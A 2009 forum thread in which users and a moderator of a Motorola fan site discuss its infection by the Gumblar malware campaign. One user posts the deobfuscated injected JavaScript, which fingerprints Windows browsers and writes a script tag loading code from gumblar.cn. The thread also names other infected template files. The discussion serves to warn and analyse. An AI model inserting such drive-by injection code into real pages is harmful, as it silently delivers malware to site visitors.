Join Today
+ Reply to Thread
Page 1 of 8 12345 ... LastLast
Results 1 to 10 of 72
  1. #1
    Join Date
    Aug 2007
    Location
    India
    Posts
    160

    Default Motorolafans Infected with trojans and Malwares. Users and Admins please be aware!

    i recently logged in to this new ((looks and hosted)) our motorolafans

    i am using NORTON INTERNET SECURITY 2009.

    Today my computer was attacked with trojan virus about every time i changed a topic on this website or log in or log out. any activity resulted in a trojan attack.
    i am safe cuz NIS09 detected the stuff...

    Requesting all the users and admins to make a note of this thing.

    a red screen used to stop me from visitin this website but whenever i proceeded trojan attack was detected in my system
    Attached Thumbnails Attached Thumbnails Motorolafans Infected with trojans and Malwares. Users and Admins please be aware!-temp.jpg   Motorolafans Infected with trojans and Malwares. Users and Admins please be aware!-tem2.jpg  

  2. #2
    Join Date
    Aug 2007
    Location
    India
    Posts
    160

    Default

    its something because motorolafans is hosted by gumblar.cn.....

  3. #3
    Join Date
    Apr 2007
    Location
    Mumbai, India
    Posts
    800

    Default

    admins & mods

    how risky is this n is it really true that the new site is infected??? i m using Symantec Anti Virus Corporate Edition, but i did not get any such alerts...

  4. #4
    Join Date
    Jan 2007
    Location
    Brazil
    Posts
    387

    Default

    Install linux and enjoy the malware free world.

    The worst virus you have on your PC is the one you call "OS".
    If you use OpenEZX and want to support it, please click on "I USE THIS" on our ohloh project page: https://www.ohloh.net/projects/openezx

  5. #5
    Join Date
    Sep 2008
    Location
    Colombia, MedellĂ­n
    Posts
    276

    Default

    wyrm : LOL

    stallman would be proud.
    if [ $you = $emo ] then
    kill $you
    else
    kill $emo
    fi

  6. #6
    Join Date
    Jul 2005
    Location
    Franconia
    Posts
    4,866

    Default

    Quote Originally Posted by rachit2588 View Post
    Requesting all the users and admins to make a note of this thing.
    Thanks for the Report!
    Yes, we are infected and working on it.
    In the meantime, switch off javascript in your browser.

  7. #7
    Join Date
    Jan 2007
    Location
    Brazil
    Posts
    387

    Default

    funny! This is how the script looks after i removed the obfuscation. Its a redirect, i wonder what value j gets on vulnerable machines. I tried to open the page at gumblar.cn, but since i dont know how to figure a vulnerable j (no windows here) i cant download the trojan.

    Code:
    var j = "", u = navigator.userAgent;
    if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof(zrvzts) != typeof("A"))) {
        zrvzts="A";
        if (window.ScriptEngine)
            j = j + ScriptEngineMajorVersion() + ScriptEngineMinorVersion() + ScriptEngineBuildVersion() + j;
        document.write("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");
    }
    Last edited by wyrm; 05-04-2009 at 08:49 AM. Reason: add code tags
    If you use OpenEZX and want to support it, please click on "I USE THIS" on our ohloh project page: https://www.ohloh.net/projects/openezx

  8. #8
    Join Date
    Jan 2007
    Location
    Brazil
    Posts
    387

    Default

    And the script above is not the only infection on motorolafans.com, there is also other infections on templates/rt_mynxx_j15/js/rokmoomenu.js and templates/rt_mynxx_j15/js/mootools.bgiframe.js

    At least they look like malware, its obfuscated javascript.
    If you use OpenEZX and want to support it, please click on "I USE THIS" on our ohloh project page: https://www.ohloh.net/projects/openezx

  9. #9
    Join Date
    Jul 2005
    Location
    Franconia
    Posts
    4,866

    Default

    Quote Originally Posted by wyrm View Post
    document.write("<script src=//gunblar.cn/rss/?id="+j+"><\/script>");

    Good to see you have some fun with it.
    btw.
    It is gumblar not gunblar.

  10. #10
    Join Date
    Jan 2007
    Location
    Brazil
    Posts
    387

    Default

    fixed.

    my JS interpreter was swallowing the "<script src=//gumblar.cn/rss/?id="+j+">" part, so i manually decoded it

    The other 2 infections i reported just causes JS errors here. This one from gumblar works, but it seems to be Windows/IE specific, as i cant download the trojan from this URL.

    I googled for it, and it seems to be spreading fast since 30/4, some people already downloaded the trojan, and it creates a "dwwin.exe" process on infected machines.

    There are already 800+ domains infected with this. And just a minute ago when i tried to open gumblar.cn on linux/firefox(no anti virus software) i got a security alert, looks like the domain is already blacklisted (by whoever provides blacklisting for firefox/ubuntu).
    If you use OpenEZX and want to support it, please click on "I USE THIS" on our ohloh project page: https://www.ohloh.net/projects/openezx


 
+ Reply to Thread
Page 1 of 8 12345 ... LastLast

Similar Threads

  1. Replies: 0
    Last Post: 09-25-2008, 11:46 AM
  2. Replies: 0
    Last Post: 09-11-2008, 07:40 PM
  3. Replies: 0
    Last Post: 08-22-2008, 03:00 PM
  4. Q: Can ming be infected with virus?
    By Anuyog in forum A1200 General Chat
    Replies: 2
    Last Post: 02-15-2008, 02:41 PM
  5. Admins should take more control on posts in this forum
    By yanivaloemail in forum A1200 General Chat
    Replies: 33
    Last Post: 08-13-2007, 05:29 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
Single Sign On provided by vBSSO

Search Engine Optimization by vBSEO 3.6.0 RC 1